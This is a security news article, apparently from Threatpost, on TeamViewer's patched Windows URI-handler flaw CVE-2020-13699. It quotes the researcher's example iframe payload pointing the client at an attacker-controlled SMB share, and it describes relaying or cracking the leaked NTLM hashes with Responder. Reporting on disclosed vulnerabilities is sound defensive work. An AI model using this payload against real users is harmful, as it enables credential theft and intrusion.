Popular remote-support software TeamViewer has patched a high-severity flaw in its desktop app for Windows. If exploited, the flaw could allow remote, unauthenticated attackers to execute code on users’ systems or crack their TeamViewer passwords.
TeamViewer is a proprietary software application used by businesses for remote-control functionalities, desktop sharing, online meetings, web conferencing and file transfer between computers. The recently discovered flaw stems from the Desktop for Windows app (CVE-2020-13699) not properly quoting its custom uniform resource identifier (URI) handlers.
Apps need to identify the URIs for the websites they will handle. But because handler applications can receive data from untrusted sources, the URI values passed to the application may contain malicious data that attempts to exploit the app. In this specific case, values are not “quoted” by the app – meaning that TeamViewer will treat them as commands rather than as input values.
“An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” according to an advisory by Jeffrey Hofmann, security engineer at Praetorian, who disclosed the flaw.
To initiate the attack, the attacker could simply persuade a victim with TeamViewer installed on their system to click on crafted URL in a website – an opportunity for attackers to potentially launch watering-hole attacks.
The URI will then trick the app into creating a connection with attacker-controlled remote Server Message Block (SMB) protocol. SMB is a network protocol used by Windows-based computers that allows systems within the same network to share files.
After a victim’s TeamViewer app initiates the remote SMB share, Windows will then make the connection using NT LAN Manager (NTLM). NTLM uses an encrypted protocol to authenticate a user without transferring the user’s password. NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user’s password.
In this attack scenario, the NTLM request can then be relayed by attackers using a tool like Responder, according to Hofmann. The Responder toolkit captures SMB authentication sessions on an internal network, and relays them to a target machine. This ultimately grants attackers access to the victim’s machine, automatically. It also allows them to capture password hashes, which they can then crack via brute-force.
Fortunately for users, while the potential impact of this vulnerability is high, “the practical impact is low,” Hofmann explained to Threatpost in an email. “Successfully performing the attack is difficult and requires user interaction. There are a lot of prerequisites to exploit the vulnerability successfully. Every modern browser except for Firefox URL encodes spaces when handing off to URI handlers which effectively prevents this attack.”
The flaw ranks 8.8 out of 10.0 on the CVSS scale, making it high severity. TeamViewer versions prior to 15.8.3 are vulnerable, and the bug affects various versions of TeamViewer, including: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 and tvvpn1.
The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3, said researchers.
In order to patch the flaw, “We implemented some improvements in URI handling relating to CVE 2020-13699,” according to TeamViewer in a statement sent to Threatpost. “Thank you, Jeffrey Hofmann with Praetorian, for your professionalism and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.”
In a security advisory regarding the flaw, the Center for Internet Security (CIS) recommended that TeamViewer users apply the appropriate patches. They also recommended that users avoid untrusted websites or links provided by unknown sources, and “educate users regarding threats posed by hypertext links contained in emails or attachments, especially from untrusted sources.”
TeamViewer’s remote control functionalities make it a lucrative attack target for bad actors – especially with more enterprises turning to collaboration apps like TeamViewer during the pandemic. In 2019, a targeted, email-borne attack against embassy officials and government finance authorities globally weaponized TeamViewer to gain full control of the infected computer. And earlier in 2020, a newly discovered variant of the Cerberus Android trojan was discovered with vastly expanded and more sophisticated info-harvesting capabilities, and the ability to run TeamViewer.
Complimentary Threatpost Webinar: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar “Cloud Security Audit: A Confidential Computing Roundtable” brings top cloud-security experts from Microsoft and Fortanix together to explore how Confidential Computing is a game changer for securing dynamic cloud data and preventing IP exposure. Join us Wednesday Aug. 12 at 2pm ET for this FREE live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix – both with the Confidential Computing Consortium. Register Now.